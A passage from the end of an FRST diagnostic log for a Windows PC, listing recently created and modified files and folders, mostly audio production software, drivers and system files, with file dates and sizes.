19:24 - 2022-06-06 19:24 - 000000000 ____D C:\ProgramData\Spectrasonics 2022-06-06 15:33 - 2022-06-06 15:33 - 000000864 _____ C:\Users\J. Cremers\Desktop\WRC8.lnk 2022-06-05 13:02 - 2022-06-14 17:51 - 000000000 ____D C:\WINDOWS\Minidump 2022-06-05 13:01 - 2022-06-05 13:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WhoCrashed 2022-06-04 19:24 - 2022-06-04 19:24 - 000000049 _____ C:\WINDOWS\SysWOW64\SYNSOPOS.exe.cfg 2022-06-04 19:24 - 2022-06-04 19:24 - 000000000 ____D C:\Users\Public\Documents\Yamaha 2022-06-04 19:24 - 2022-06-04 19:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eLicenser 2022-06-04 19:24 - 2022-06-04 19:24 - 000000000 ____D C:\ProgramData\Downloaded Installations 2022-06-04 19:24 - 2022-06-04 19:24 - 000000000 ____D C:\Program Files\eLicenser 2022-06-04 19:24 - 2022-06-04 19:24 - 000000000 ____D C:\Program Files (x86)\Syncrosoft 2022-06-04 19:24 - 2022-06-04 19:24 - 000000000 ____D C:\Program Files (x86)\eLicenser 2022-06-04 19:24 - 2020-06-30 10:40 - 005141040 _____ (Steinberg Media Technologies GmbH) C:\WINDOWS\SysWOW64\SYNSOACC.dll 2022-06-04 19:24 - 2011-12-14 21:21 - 000086016 _____ C:\WINDOWS\SysWOW64\SYNSOPOS.exe 2022-06-04 19:07 - 2022-06-04 19:25 - 000000000 ____D C:\ProgramData\eLicenser 2022-06-02 20:40 - 2022-06-02 20:40 - 000000000 __HDC C:\ProgramData\{3006A797-CDFA-44FC-98EF-155579E2CDBF} 2022-06-01 22:32 - 2022-06-01 23:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Arturia 2022-06-01 22:32 - 2022-06-01 22:32 - 000001032 _____ C:\Users\J. Cremers\Desktop\Analog Lab 4.lnk 2022-06-01 22:29 - 2022-06-03 20:22 - 000000000 ___RD C:\Program Files\Arturia 2022-06-01 21:02 - 2022-06-01 21:02 - 000000000 ____D C:\Users\J. Cremers\AppData\Local\Spectrasonics 2022-06-01 18:56 - 2022-06-01 18:56 - 000000000 ____D C:\Users\J. Cremers\AppData\Roaming\SitalaStandalone 2022-06-01 18:56 - 2022-06-01 18:56 - 000000000 ____D C:\Users\J. Cremers\AppData\Roaming\Sitala 2022-06-01 18:54 - 2022-06-01 18:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sitala 2022-06-01 18:54 - 2022-06-01 18:54 - 000000000 ____D C:\Program Files\Sitala 2022-05-29 08:21 - 2022-05-29 08:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Yamaha Steinberg USB Driver 2022-05-29 08:21 - 2022-05-29 08:21 - 000000000 ____D C:\Program Files (x86)\Yamaha 2022-05-28 14:54 - 2022-05-28 14:54 - 000288768 _____ C:\WINDOWS\system32\Windows.Management.InprocObjects.dll 2022-05-28 14:54 - 2022-05-28 14:54 - 000188928 _____ C:\WINDOWS\system32\uwfcfgmgmt.dll 2022-05-28 14:54 - 2022-05-28 14:54 - 000093696 _____ C:\WINDOWS\system32\Drivers\cimfs.sys 2022-05-28 14:54 - 2022-05-28 14:54 - 000011799 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim 2022-05-28 14:49 - 2022-05-28 14:49 - 000000000 ___HD C:\$WinREAgent 2022-05-28 07:18 - 2022-05-28 07:18 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steinberg UR44 2022-05-27 14:11 - 2022-05-27 14:11 - 000000000 ____D C:\Users\J. Cremers\AppData\Roaming\Yamaha 2022-05-20 20:49 - 2022-05-20 20:51 - 000000000 ____D C:\Reaper 2022-05-17 18:23 - 2022-05-17 18:23 - 000000000 ____D C:\Users\J. Cremers\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Celemony 2022-05-17 18:23 - 2022-05-17 18:23 - 000000000 ____D C:\ProgramData\Celemony Software GmbH 2022-05-17 18:23 - 2022-05-17 18:23 - 000000000 ____D C:\Program Files\Common Files\Celemony 2022-05-17 18:23 - 2022-05-17 18:23 - 000000000 ____D C:\Program Files\Celemony 2022-05-17 18:23 - 2022-05-17 18:23 - 000000000 ____D C:\Program Files (x86)\Celemony 2022-05-17 12:48 - 2022-06-08 16:57 - 000000000 ____D C:\Users\J. Cremers\AppData\Roaming\Celemony Software GmbH ==================== One month (modified) ================== (If an entry is included in the fixlist, the file/folder will be moved.) 2022-06-15 11:01 - 2021-03-20 12:31 - 001771392 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2022-06-15 11:01 - 2019-12-07 17:14 - 000785814 _____ C:\WINDOWS\system32\perfh013.dat 2022-06-15 11:01 - 2019-12-07 17:14 - 000154016 _____ C:\WINDOWS\system32\perfc013.dat 2022-06-15 11:01 - 2019-12-07 11:13 - 000000000 ____D C:\WINDOWS\INF 2022-06-15 10:59 - 2020-01-11 10:12 - 000000000 ____D C:\Users\J. Cremers\AppData\Local\OpenShell 2022-06-15 10:58 - 2019-12-07 11:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2022-06-15 10:56 - 2020-12-06 19:25 - 000000000 ____D C:\Users\J. Cremers\AppData\Roaming\WACUP 2022-06-15 10:56 - 2019-12-05 09:17 - 000000000 ____D C:\Users\J. Cremers\AppData\LocalLow\Mozilla 2022-06-15 10:55 - 2021-10-06 08:40 - 000000000 ____D C:\ProgramData\NVIDIA 2022-06-15 10:55 - 2021-03-20 12:29 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2022-06-15 10:55 - 2021-03-20 12:24 - 000008192 ___SH C:\DumpStack.log.tmp 2022-06-15 10:55 - 2019-12-07 11:03 - 000262144 _____ C:\WINDOWS\system32\config\BBI 2022-06-15 10:55 - 2019-09-28 00:58 - 000000000 ____D C:\ProgramData\NZBGet 2022-06-15 10:55 - 2019-09-27 23:19 - 000000139 _____ C:\Users\J. Cremers\AppData\Roaming\Network Monitor II_#0_Traffic.ini 2022-06-15 10:16 - 2021-12-27 16:15 - 000036408 _____ (Sysinternals - www.sysinternals.com) C:\WINDOWS\system32\Drivers\PROCEXP152.SYS 2022-06-15 10:16 - 2019-10-05 11:41 - 000001039 _____ C:\Users\J. Cremers\Desktop\Procexp.lnk 2022-06-15 09:42 - 2015-03-15 11:08 - 000000000 ____D C:\Pd 2022-06-15 09:21 - 2019-09-29 23:06 - 000000600 _____ C:\Users\J. Cremers\AppData\Roaming\winscp.rnd 2022-06-15 09:09 - 2021-03-20 12:24 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2022-06-14 22:53 - 2019-09-27 14:38 - 000000000 ____D C:\Users\J. Cremers\AppData\Local\D3DSCache 2022-06-14 22:49 - 2021-03-20 12:25 - 000000000 ____D C:\Users\J. Cremers 2022-06-14 21:48 - 2015-03-02 21:44 - 000000000 ____D C:\Oracle 2022-06-14 21:32 - 2021-10-07 20:42 - 000000000 ____D C:\Users\J. Cremers\AppData\Local\NVIDIA 2022-06-14 21:32 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\AppReadiness 2022-06-14 17:51 - 2021-03-27 12:42 - 000000000 ____D C:\WINDOWS\Panther 2022-06-14 15:49 - 2020-05-05 14:31 - 000000000 ____D C:\Users\J. Cremers\AppData\Roaming\obs-studio 2022-06-14 14:28 - 2020-08-07 14:13 - 000000000 ____D C:\Steam 2022-06-12 17:12 - 2015-03-01 17:19 - 000000000 ____D C:\cat4 2022-06-12 12:49 - 2019-11-12 15:36 - 000000000 ___RD C:\Jean 2022-06-12 12:08 - 2020-09-23 22:24 - 000000000 ____D C:\WACUP 2022-06-12 12:08 - 2020-09-16 16:02 - 000000000 ____D C:\Users\J. Cremers\AppData\Local\WACUP 2022-06-11 18:02 - 2021-03-20 12:25 - 000002483 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2022-06-11 18:02 - 2019-12-07 11:14 - 000000000 ___HD C:\Program Files\WindowsApps 2022-06-11 17:02 - 2015-03-24 16:46 - 000000000 ____D C:\Songs 2022-06-11 15:59 - 2020-09-14 21:13 - 000000000 ____D C:\Mc 2022-06-11 15:18 - 2019-09-29 17:54 - 000000000 ____D C:\Users\J. Cremers\.VirtualBox 2022-06-11 15:18 - 2019-09-29 17:54 - 000000000 ____D C:\ProgramData\VirtualBox 2022-06-11 08:23 - 2019-09-29 14:48 - 000000000 ____D C:\in 2022-06-11 08:15 - 2019-09-28 13:35 - 000000000 ____D C:\tmp 2022-06-10 13:22 - 2019-09-29 12:11 - 000000000 ____D C:\Users\J. Cremers\AppData\Roaming\qBittorrent 2022-06-10 12:10 - 2019-12-21 20:15 - 000000000 ____D C:\Users\J. Cremers\AppData\Roaming\REAPER 2022-06-09 23:11 - 2019-09-30 15:22 - 000000000 ____D C:\Program Files\Common Files\VST3 2022-06-08 16:07 - 2020-06-09 11:55 - 000000000 ____D C:\Users\J. Cremers\AppData\Local\CrashDumps 2022-06-06 20:59 - 2022-05-11 23:56 - 000000000 ____D C:\Users\J. Cremers\AppData\Roaming\MeldaProduction 2022-06-05 13:24 - 2019-12-07 11:03 - 000000000 ____D C:\WINDOWS\CbsTemp 2022-06-05 13:04 - 2020-01-27 23:06 - 000000000 ____D C:\Users\J. Cremers\AppData\Local\DBG 2022-06-05 13:01 - 2019-10-05 16:39 - 000000000 ____D C:\Tools 2022-06-04 19:42 - 2019-09-27 20:52 - 000000000 ____D C:\Games 2022-06-04 19:23 - 2021-03-20 12:29 - 000003606 _____ C:\WINDOWS\system32\Tasks\UninstallTool_SkipUAC_J. Cremers 2022-06-04 19:00 - 2022-05-11 20:18 - 000000000 ____D C:\Users\J. Cremers\Documents\IK Multimedia 2022-06-04 19:00 - 2022-05-11 20:18 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IK Multimedia 2022-06-04 19:00 - 2022-05-09 13:31 - 000000000 ____D C:\Program Files\Native Instruments 2022-06-04 19:00 - 2019-09-30 13:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments 2022-06-03 20:22 - 2019-10-08 16:58 - 000000000 ___RD C:\ProgramData\Arturia 2022-06-02 23:37 - 2019-09-26 15:39 - 000000000 ____D C:\Users\J. Cremers\AppData\Local\VirtualStore 2022-06-02 16:47 - 2022-05-09 13:37 - 000000000 ____D C:\Users\Public\Documents\NI Resources 2022-06-01 18:54 - 2022-05-05 21:53 - 000000000 ____D C:\Program Files\Steinberg 2022-06-01 18:54 - 2019-09-30 12:06 - 000000000 ____D C:\Program Files (x86)\Steinberg 2022-06-01 16:41 - 2019-10-02 08:47 - 000000000 ____D C:\Users\J. Cremers\AppData\Roaming\audacity 2022-05-29 08:21 - 2019-09-27 12:39 - 000000000 ____D C:\ProgramData\Yamaha_Uninstaller 2022-05-29 07:28 - 2019-10-02 01:29 - 000000032 _____ C:\Users\J. Cremers\AppData\Roaming\msregsvv.dll 2022-05-29 07:28 - 2019-10-02 01:29 - 000000032 _____ C:\ProgramData\autobk.inc 2022-05-28 19:09 - 2019-08-03 15:50 - 000000000 ____D C:\Vb 2022-05-28 15:17 - 2021-03-20 12:24 - 000506184 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2022-05-28 15:16 - 2021-03-20 12:10 - 000000000 ___SD C:\WINDOWS\system32\lxss 2022-05-28 15:16 - 2019-12-07 17:17 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection 2022-05-28 15:16 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\system32\UNP 2022-05-28 15:16 - 2019-12-07 11:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2022-05-28 15:16 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SystemResources 2022-05-28 15:16 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\migwiz 2022-05-28 15:16 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\bcastdvr 2022-05-28 15:16 - 2019-12-07 11:14 - 000000000 ____D C:\Program Files\Common Files\System 2022-05-28 15:05 - 2019-09-30 12:04 - 000000000 ____D C:\Cubase 5 2022-05-28 07:18 - 2019-09-30 12:00 - 000000000 ____D C:\ProgramData\Steinberg 2022-05-28 07:10 - 2019-09-27 10:38 - 000000000 ____D C:\Users\J. Cremers\AppData\Local\ElevatedDiagnostics 2022-05-27 11:12 - 2022-04-18 07:46 - 000000000 ____D C:\Users\J. Cremers\AppData\Roaming\flameshot 2022-05-21 18:22 - 2020-01-07 09:35 - 000000000 ____D C:\4kvideodownloader 2022-05-19 10:08 - 2019-09-29 17:54 - 000000000 ____D C:\VirtualBox 2022-05-19 07:52 - 2015-02-19 22:23 - 000000000 ____D C:\Girls 2022-05-18 14:54 - 2019-12-21 20:20 - 000000000 ____D C:\Users\J. Cremers\Documents\REAPER Media ==================== Files in the root of some directories ======== 2004-08-17 17:19 - 2004-08-17 17:19 - 000000000 ____H () C:\ProgramData\sdpsenv.dat 2021-03-20 13:19 - 2021-03-20 13:20 - 000000099 _____ () C:\Users\J. Cremers\IP_Log_Data.js 2019-10-04 09:39 - 2019-10-04 09:41 - 000150528 _____ () C:\Program Files\min.exe 2019-10-05 11:38 - 2019-10-05 11:38 - 002004933 _____ () C:\Program Files\ProcessExplorer.zip 2021-03-20 14:58 - 2021-03-20 14:58 - 000000626 _____ () C:\Users\J. Cremers\AppData\Roaming\All CPU MeterV3_Settings.ini 2021-03-20 16:48 - 2021-03-20 16:49 - 000000839 _____ () C:\Users\J. Cremers\AppData\Roaming\Drives Meter_Settings.ini 2021-03-20 16:33 - 2022-03-10 19:53 - 000000641 _____ () C:\Users\J. Cremers\AppData\Roaming\Drives Monitor_#0_Settings.ini 2022-03-10 18:32 - 2022-03-10 18:33 - 000000642 _____ () C:\Users\J. Cremers\AppData\Roaming\Drives Monitor_#1_Settings.ini 2019-10-07 19:47 - 2020-01-04 17:31 - 000000598 _____ () C:\Users\J. Cremers\AppData\Roaming\Drives Monitor_Settings.ini 2020-04-19 12:26 - 2020-04-19 12:26 - 000000194 _____ () C:\Users\J. Cremers\AppData\Roaming\ex_log.txt 2019-10-02 01:29 - 2022-05-29 07:28 - 000000032 _____ () C:\Users\J. Cremers\AppData\Roaming\msregsvv.dll 2022-03-16 12:27 - 2022-03-16 12:27 - 001249792 _____ (hxxp://www.ruby-lang.org/) C:\Users\J. Cremers\AppData\Roaming\msvcr90-ruby191.dll 2021-03-20 13:23 - 2021-03-20 13:23 - 000000017 _____ () C:\Users\J. Cremers\AppData\Roaming\Network Meter_Usage.ini 2020-07-01 15:16 - 2021-04-26 19:01 - 000000175 _____ () C:\Users\J. Cremers\AppData\Roaming\Network Monitor II_#0_LockedNICs.ini 2019-09-27 21:53 - 2021-04-26 19:01 - 000000988 _____ () C:\Users\J. Cremers\AppData\Roaming\Network Monitor II_#0_Settings.ini 2019-09-27 23:19 - 2022-06-15 10:55 - 000000139 _____ () C:\Users\J. Cremers\AppData\Roaming\Network Monitor II_#0_Traffic.ini 2021-12-27 23:37 - 2021-12-27 23:37 - 000000016 _____ () C:\Users\J. Cremers\AppData\Roaming\obs-virtualcam.txt 2019-09-27 21:50 - 2021-04-26 18:59 - 000004003 _____ () C:\Users\J. Cremers\AppData\Roaming\System Monitor II_CPU0_Settings.ini 2019-09-27 21:40 - 2021-03-20 09:36 - 000000118 _____ () C:\Users\J. Cremers\AppData\Roaming\System Monitor II_UptimeRecord.ini 2019-09-28 10:24 - 2019-10-06 19:52 - 000000381 _____ () C:\Users\J. Cremers\AppData\Roaming\Top Process Monitor Mem_Settings.ini 2019-10-10 18:09 - 2021-04-26 19:01 - 000000386 _____ () C:\Users\J. Cremers\AppData\Roaming\Top Process Monitor_#0_Settings.ini 2019-10-10 18:12 - 2021-11-18 09:03 - 000000387 _____ () C:\Users\J. Cremers\AppData\Roaming\Top Process Monitor_#1_Settings.ini 2019-09-27 21:42 - 2019-10-10 18:06 - 000000388 _____ () C:\Users\J. Cremers\AppData\Roaming\Top Process Monitor_Settings.ini 2019-10-01 18:16 - 2021-04-26 19:01 - 000000567 _____ () C:\Users\J. Cremers\AppData\Roaming\Weather Monitor_#0_Settings.ini 2019-09-27 21:44 - 2019-10-01 07:41 - 000000503 _____ () C:\Users\J. Cremers\AppData\Roaming\Weather Monitor_Settings.ini 2020-06-25 12:16 - 2020-06-25 12:06 - 000000429 _____ () C:\Users\J. Cremers\AppData\Roaming\Winamp Info Tool 2019-09-29 23:06 - 2022-06-15 09:21 - 000000600 _____ () C:\Users\J. Cremers\AppData\Roaming\winscp.rnd 2019-09-30 00:21 - 2021-08-27 00:21 - 000000256 _____ () C:\Users\J. Cremers\AppData\Local\PUTTY.RND 2019-10-14 17:55 - 2021-01-10 17:35 - 000007626 _____ () C:\Users\J. Cremers\AppData\Local\resmon.resmoncfg 2019-10-02 21:32 - 2019-10-02 21:32 - 000000003 _____ () C:\Users\J. Cremers\AppData\Local\updater.log 2019-10-02 21:32 - 2022-04-18 11:15 - 000000059 _____ () C:\Users\J. Cremers\AppData\Local\UserProducts.xml ==================== SigCheck ============================ (There is no automatic fix for files that do not pass verification.) ==================== End of FRST.txt ========================